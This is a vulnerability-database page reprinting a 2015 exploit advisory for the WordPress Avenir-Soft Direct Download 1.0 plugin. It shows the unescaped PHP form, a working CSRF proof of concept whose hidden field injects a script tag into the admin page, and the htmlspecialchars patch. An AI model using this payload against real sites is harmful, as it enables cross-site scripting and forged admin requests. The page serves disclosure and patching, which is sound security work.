Lucene search

K

WordPress Avenir-Soft Direct Download 1.0 XSS / CSRF

🗓️ 07 Aug 2015 00:00:00Reported by Mahdi.HiddenType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

Wordpress Avenir-Soft Direct Download 1.0 XSS / CSRF exploi

Show more
Code
`######################  
# Exploit Title: Wordpress Avenir-Soft Direct Download Plug-in XSS/CSRF  
# Exploit Author: Ashiyane Digital Security Team  
# Vendor Homepage: https://wordpress.org/plugins/avenirsoft-directdownload/  
# Date: 2015-08-06  
# Tested On: Kali Linux - FireFox  
# Software Link:   
https://downloads.wordpress.org/plugin/avenirsoft-directdownload.zip  
# Version: 1.0  
######################  
# Vulnerable Code:  
  
<form method="post" action="">  
<textarea name="style1" class="style" rows="10" cols="20"><?php echo   
file_get_contents($cssurl); ?>  
</textarea>  
<p>  
<input type="submit" value="Save Changes" name="submitbutton">  
</p>  
</form>  
######################  
# Exploit:  
  
<form method="post"   
action="http://[URL]/[Path]/wp-admin/admin.php?page=avenir_plugin">  
<input type="hidden" name="style1"   
value="</textarea><script>alert(/xss/)</script>">  
<input type="submit" value="Save Changes" name="submitbutton">  
</p>  
</form>  
######################  
# Patch:  
  
<form method="post" action="">  
<textarea name="style1" class="style" rows="10" cols="20"><?php echo   
htmlspecialchars(file_get_contents($cssurl)); ?>  
</textarea>  
<p>  
<input type="submit" value="Save Changes" name="submitbutton">  
</p>  
</form>  
######################  
# Discovered By: Mahdi.Hidden  
######################  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo